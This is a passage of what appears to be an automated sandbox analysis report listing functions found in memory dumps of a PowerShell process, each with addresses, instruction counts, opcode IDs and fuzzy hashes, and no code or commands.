                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2214086418.00007FF9BAF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9baf40000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 27cbb4d6c87c97487369dcf7f7be2b52fd4299c1d67a32ca8bfb73e074cc178a
                                                                                                                  • Instruction ID: f96bf67ba4c30127fb4bf8576a37dfb0090ffcfea6e2f81bacdb38b934126d4c
                                                                                                                  • Opcode Fuzzy Hash: 27cbb4d6c87c97487369dcf7f7be2b52fd4299c1d67a32ca8bfb73e074cc178a
                                                                                                                  • Instruction Fuzzy Hash: 2831C13190CA8C8FDB19DB6D98496F9BBF1EF56321F0482AFC049D3252DB60A805CB91
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB824C7A Relevance: .6, Instructions: 646COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cd62e4b6f586c50671a9c3c11dfd3e337287f74c7d0b20b1e66a1ce192195f9
                                                                                                                  • Instruction ID: ddb7929720a309d2b3aab1cc807bc4625b77fd4cd7b0a31a17c5300ad45f9603
                                                                                                                  • Opcode Fuzzy Hash: 3cd62e4b6f586c50671a9c3c11dfd3e337287f74c7d0b20b1e66a1ce192195f9
                                                                                                                  • Instruction Fuzzy Hash: 3312CE31A0CA4A8FEBA9DF1CD4557A977E1FF95310F0440BAD58EC72E2DE24B9428781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB093E0 Relevance: .6, Instructions: 554COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9a389294b261aabb68acf99b7239b006e54769e6ea646e1a95de629bf9ca634b
                                                                                                                  • Instruction ID: a2ccd1a611e4e061f03842422c2c968c554eb359364438590a219e059dcef882
                                                                                                                  • Opcode Fuzzy Hash: 9a389294b261aabb68acf99b7239b006e54769e6ea646e1a95de629bf9ca634b
                                                                                                                  • Instruction Fuzzy Hash: 76F18121A1CE494FE798EB2C94557B9B3D2FF99710F51817EE04EC32E7DE28A8418B41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB54A4C1 Relevance: .4, Instructions: 407COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e482a58089f9f089740e6e7b97b80d3065cbbc679b2896e574189af475ef9c68
                                                                                                                  • Instruction ID: 5aafc86b17901ebfc51e68250397bcfe90c1e4a1b1e6336adee9e644bae0fb62
                                                                                                                  • Opcode Fuzzy Hash: e482a58089f9f089740e6e7b97b80d3065cbbc679b2896e574189af475ef9c68
                                                                                                                  • Instruction Fuzzy Hash: 7DC1C131A0CA4A4FEB94EF1C94407A977E1FF99310F1442AAD04EC729BDA75F842CB81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6C0DB0 Relevance: .4, Instructions: 396COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2277370557.00007FF9BB6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB6C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb6c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 82b7ee57e0bfaeb77b9f1e05208261cb490cd39dd9fea48befadb04c8be95387
                                                                                                                  • Instruction ID: 328669f11635ead57c0bedeb880fd8f343900d1467d22746c2a049513b585751
                                                                                                                  • Opcode Fuzzy Hash: 82b7ee57e0bfaeb77b9f1e05208261cb490cd39dd9fea48befadb04c8be95387
                                                                                                                  • Instruction Fuzzy Hash: 8DB1BE22E0DE4A8FEB94EF2CA4557B567D2FF98320F5541BAD00DC32E6DE29AD418740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6C839D Relevance: .4, Instructions: 392COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2277370557.00007FF9BB6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB6C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb6c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a3ac1f420622b17c5e398ffaf3a1d190157963d048f29a5df692210d8c585ee6
                                                                                                                  • Instruction ID: b99f79254478c28c2f425ddbbf1251216f1dfacda736a5446c5fbd843c80f47d
                                                                                                                  • Opcode Fuzzy Hash: a3ac1f420622b17c5e398ffaf3a1d190157963d048f29a5df692210d8c585ee6
                                                                                                                  • Instruction Fuzzy Hash: D6D17D35A08A4A8FDB98EF18D855BA977E2FF99310F5540A9D40DC72A2DE75FC02C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6C4540 Relevance: .4, Instructions: 389COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2277370557.00007FF9BB6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB6C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb6c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1a87edbab8559bc1d4a3f6ffbf72e510076b35315918e1fb675dda1437f5af41
                                                                                                                  • Instruction ID: 15f8fbc9825b1cf0a73f80955ca390bd5cadb22587b0e9c514c7c7dc86c0d736
                                                                                                                  • Opcode Fuzzy Hash: 1a87edbab8559bc1d4a3f6ffbf72e510076b35315918e1fb675dda1437f5af41
                                                                                                                  • Instruction Fuzzy Hash: 71C17D35A18A4A8FDB98EF18D855BA977E2FF99310F5140A9D40DC72A2DE75FC02C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB13955 Relevance: .3, Instructions: 301COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e304d481955ab74f5437c17d6732338ff7652700089aea0289426ecdd271d855
                                                                                                                  • Instruction ID: f4435f82cd2d11a06b3bd5e9f85b2cfb1bc1f66b78981097e34b0dd3ba73e575
                                                                                                                  • Opcode Fuzzy Hash: e304d481955ab74f5437c17d6732338ff7652700089aea0289426ecdd271d855
                                                                                                                  • Instruction Fuzzy Hash: 3681D321B1CE194FE7A8EB2C58193BA62D1EF99321F0540BAD50EC72D3ED5DBD414781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB550ACA Relevance: .3, Instructions: 259COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9031ba8ad9449d9789d55b102d07a2bfb700ad3cb8396facb0cae5d1eab06e35
                                                                                                                  • Instruction ID: 74372b35f4a9a7858992543656b1eace33e181cbe506db6f2c3b376833cfc77e
                                                                                                                  • Opcode Fuzzy Hash: 9031ba8ad9449d9789d55b102d07a2bfb700ad3cb8396facb0cae5d1eab06e35
                                                                                                                  • Instruction Fuzzy Hash: A581AF2090CA4A4FE678EE2C84643BD76D1FF46351F18007AD28AC66E3DEDE7A418752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB352AE9 Relevance: .3, Instructions: 259COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e4b5c9ca2d484702bee62ff08cdda302324fa5e0d7014d9adf1e0783ca3e030f
                                                                                                                  • Instruction ID: ba84d2b2167bd1ef50f97e645de0fa05b610012157e03005ccdbffa2dd81aad5
                                                                                                                  • Opcode Fuzzy Hash: e4b5c9ca2d484702bee62ff08cdda302324fa5e0d7014d9adf1e0783ca3e030f
                                                                                                                  • Instruction Fuzzy Hash: 2571B022A1EF864EE799DE1C6C9227876D2FF85220B4801BED54EC71E7ED48F9014381
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB356A9E Relevance: .2, Instructions: 224COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15325bfbc128b635d5b85c59294c11b991270c56772cf97f25648dc4c5c96b4c
                                                                                                                  • Instruction ID: 59a767334ed766d6f199511c2c0f89d1f97dfe2ad4d8e1996bc0b3ac323b41ee
                                                                                                                  • Opcode Fuzzy Hash: 15325bfbc128b635d5b85c59294c11b991270c56772cf97f25648dc4c5c96b4c
                                                                                                                  • Instruction Fuzzy Hash: 16610622A2FE864FE799DB6D18613B866D2FF45361B4841BED58EC71E3EC48F9408341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3E13CB Relevance: .2, Instructions: 168COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2246107726.00007FF9BB3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb3c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9aaed0e23842acb53238f8e2f0a341add84aa8282d022605a7c821b6b6cb0ef6
                                                                                                                  • Instruction ID: fb18a2d89933642d9e98758444b0cb2e951ffdffd41b634f00e1a58d676877ec
                                                                                                                  • Opcode Fuzzy Hash: 9aaed0e23842acb53238f8e2f0a341add84aa8282d022605a7c821b6b6cb0ef6
                                                                                                                  • Instruction Fuzzy Hash: 5B41752680EBA216E711F7BC74960E56FA4DF0727471980F7D0CE4E0E3EC4934569A99
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB821767 Relevance: .2, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2287935941.00007FF9BB820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB820000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb820000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d7c1720cb72a7fe744dac2f7a49df1737a5710caa0d8c09da93143d255b4f2c7
                                                                                                                  • Instruction ID: 2b4de00957d69fae6492611ff0d09256d4448dbee9f19753151f07cbef94aed8
                                                                                                                  • Opcode Fuzzy Hash: d7c1720cb72a7fe744dac2f7a49df1737a5710caa0d8c09da93143d255b4f2c7
                                                                                                                  • Instruction Fuzzy Hash: 8341E831B1CD094FE698EA4CE4557B9B3D1FF95360F14017AD94EC32E6DE26BC428684
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5469D6 Relevance: .2, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ea06507e52e78e5f6c10945dc6ebfba3df44a7dbf7270a84afd739e3cd8c35ed
                                                                                                                  • Instruction ID: 1609b5117ce255d7dc7dfc152adc594a56f944e55ad022e21a8c7be78633c6bd
                                                                                                                  • Opcode Fuzzy Hash: ea06507e52e78e5f6c10945dc6ebfba3df44a7dbf7270a84afd739e3cd8c35ed
                                                                                                                  • Instruction Fuzzy Hash: 0351033180DA854FE316DB3898113A57FA0FF06314B0941FED188CB5E3DAAAB985C752
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB54C95D Relevance: .1, Instructions: 144COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01e2fafad8a3aa0cf2923a35a10ed5e2471da565579b7af49679f8327c3b6030
                                                                                                                  • Instruction ID: cfe0220a825121f95a78d3e1d8222b1417848a63bca4891dfa3605e235446fcb
                                                                                                                  • Opcode Fuzzy Hash: 01e2fafad8a3aa0cf2923a35a10ed5e2471da565579b7af49679f8327c3b6030
                                                                                                                  • Instruction Fuzzy Hash: EE418E3160DA894FDB85EB2C8458E647BE1EF9A31170940FAD04DCB1F7DA69EC85CB41
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB356AEA Relevance: .1, Instructions: 142COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6cb9673927629eb0b924be55dd51d12e3ce6da7d6fbb2af26d64fff1ddc0be88
                                                                                                                  • Instruction ID: 8c745d0d6dee2f1844437959f6890bf1245166af8540e79052730413e0565333
                                                                                                                  • Opcode Fuzzy Hash: 6cb9673927629eb0b924be55dd51d12e3ce6da7d6fbb2af26d64fff1ddc0be88
                                                                                                                  • Instruction Fuzzy Hash: 4E41C262E2FF864BE799DB6D08652786AD2FF81351B4940BAD58DC71E3EC48FA804341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB6C0A85 Relevance: .1, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2277370557.00007FF9BB6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB6C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb6c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 097375d328460f842aa0b1e155069021080045a2085119f7cacdabd41b838586
                                                                                                                  • Instruction ID: cb2ec03eb814b50e44fe6b740b4890eb913504dc8f3b3a97157e8a8f3b277086
                                                                                                                  • Opcode Fuzzy Hash: 097375d328460f842aa0b1e155069021080045a2085119f7cacdabd41b838586
                                                                                                                  • Instruction Fuzzy Hash: 5831013090C64C8FDB49DFA8D84AAF97BF0EB56320F0441ABD04DC7163DA65A946CB92
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB059E6 Relevance: .1, Instructions: 102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2308058845.00007FF9BBB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bbb00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c51a1bedd67aadd65c71b7e2a1bfb25cbbe20c6a736ffdb09b9c2ded096df5e
                                                                                                                  • Instruction ID: f808e7fc39501ccc449e62cd468faa74cd7faed57bd98207ee6ae0592359305b
                                                                                                                  • Opcode Fuzzy Hash: 5c51a1bedd67aadd65c71b7e2a1bfb25cbbe20c6a736ffdb09b9c2ded096df5e
                                                                                                                  • Instruction Fuzzy Hash: F221E171909A8E0FD792DFAC94957ED7FE1FF4A320F4400ABE14CD32A2DA6819468781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB352BE4 Relevance: .1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05706933f2336252380dd130acbd9f0a7f774cd5ffa7cb2888afc98981b9d700
                                                                                                                  • Instruction ID: e05340e1a601d7c327a2b0f84d79e99be85946c49d0fd58517d620bfe67b383f
                                                                                                                  • Opcode Fuzzy Hash: 05706933f2336252380dd130acbd9f0a7f774cd5ffa7cb2888afc98981b9d700
                                                                                                                  • Instruction Fuzzy Hash: 6C21D222A1EF4A4BE399DB2C2C9527866D2FF85221B8900BAE54DC72E7ED59FD014341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3DFB88 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2246107726.00007FF9BB3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb3c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b01e63902e579e41b617c1bba853fd6f943edf7b29c517813291091159eabbab
                                                                                                                  • Instruction ID: 2aff89dbb94da01b201acac0bdbe299d83039cb1494d38cca8fb2209863395db
                                                                                                                  • Opcode Fuzzy Hash: b01e63902e579e41b617c1bba853fd6f943edf7b29c517813291091159eabbab
                                                                                                                  • Instruction Fuzzy Hash: 3F210211B1DE150BF258B76C681A7BAA2C6EF89721F5441BBE40EC33E3EC597C024291
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB548015 Relevance: .1, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e77c72b3532d46e0f3c90ffe84ac4987bc72601dec3c52305be491c4d0225f71
                                                                                                                  • Instruction ID: 9136511a1f14dae294889c228637da4ac1c1124f51a1e853a546256e773659c5
                                                                                                                  • Opcode Fuzzy Hash: e77c72b3532d46e0f3c90ffe84ac4987bc72601dec3c52305be491c4d0225f71
                                                                                                                  • Instruction Fuzzy Hash: 8D21A731B1CE0A4FEB95EE0CA4816F973E2FB98310B10057AD04EC328BDEA5F9458781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB357D41 Relevance: .1, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 125837b65bf5107a9d5cdcec5be60e36e3c26abfd49d7f7a94a5264e825729ee
                                                                                                                  • Instruction ID: beab1b652c303a184dca9d60a1a9c2944e91d8009b2cb1bfd7b052e47806c7d0
                                                                                                                  • Opcode Fuzzy Hash: 125837b65bf5107a9d5cdcec5be60e36e3c26abfd49d7f7a94a5264e825729ee
                                                                                                                  • Instruction Fuzzy Hash: B221309190FBC68FE757DF2C08656B47FE1AF57200B8900FAC189CB1E3D889B90A8711
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB546AC5 Relevance: .1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2261403390.00007FF9BB540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB540000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb540000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e06b8e97ba09b724d5d8d35d937cd40639991ce3cfdd933cc930ff82c0b171af
                                                                                                                  • Instruction ID: 324653fb128525a1a840a2f8ef3d44e8066b0bfab09aea0f43ae2398c3812c88
                                                                                                                  • Opcode Fuzzy Hash: e06b8e97ba09b724d5d8d35d937cd40639991ce3cfdd933cc930ff82c0b171af
                                                                                                                  • Instruction Fuzzy Hash: 5011DF6190DA864FD3A5DB3C84453A57BA1FF4A32470802FED088CB6D7DAA9A8458792
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB3E14CA Relevance: .1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2246107726.00007FF9BB3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb3c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcea48149d88241b21432eec3cc180840ae257342f6b27ddc63e4f55f675ae26
                                                                                                                  • Instruction ID: 77a16c42dc62874f1cd4b38d4f3e013dfcc6836b9763c99e871df5147acacf76
                                                                                                                  • Opcode Fuzzy Hash: bcea48149d88241b21432eec3cc180840ae257342f6b27ddc63e4f55f675ae26
                                                                                                                  • Instruction Fuzzy Hash: 1A01042190EBA20FE306E76C38955F23FA4DF1723470940F7D48DCA1E3DC89284687A9
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1A1E6E Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2230233829.00007FF9BB1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb1a0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bb1eeb8a7949d810bcbe54852a9c0f9d7ec9529860ad69b2dc9944d2e16262cd
                                                                                                                  • Instruction ID: 36991aa6339ce7177ea1e1ebfb856fd51dfedd96c9a227eccac0adeaa896a820
                                                                                                                  • Opcode Fuzzy Hash: bb1eeb8a7949d810bcbe54852a9c0f9d7ec9529860ad69b2dc9944d2e16262cd
                                                                                                                  • Instruction Fuzzy Hash: 6101D620708C4A9FD345EB2D8054BA57BD2FFA9310F1401F6D00DCB293DE69F9818781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB35783F Relevance: .0, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000001A.00000002.2242504471.00007FF9BB350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB350000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_26_2_7ff9bb350000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0642305961d44c735fe13a3a96981c161ae6dd09533ec87ea6f7e061ad6eac36
                                                                                                                  • Instruction ID: 925470b64ef1fff3564fef6a7221d3f90c8f688afdd31c69b126da9d33cab43e
                                                                                                                  • Opcode Fuzzy Hash: 0642305961d44c735fe13a3a96981c161ae6dd09533ec87ea6f7e061ad6eac36
                                                                                                                  • Instruction Fuzzy Hash: 2C018452D0EAD25FE757EF2818562E06FA0FF26240B4900F6D148CB1F3E9C97D858341
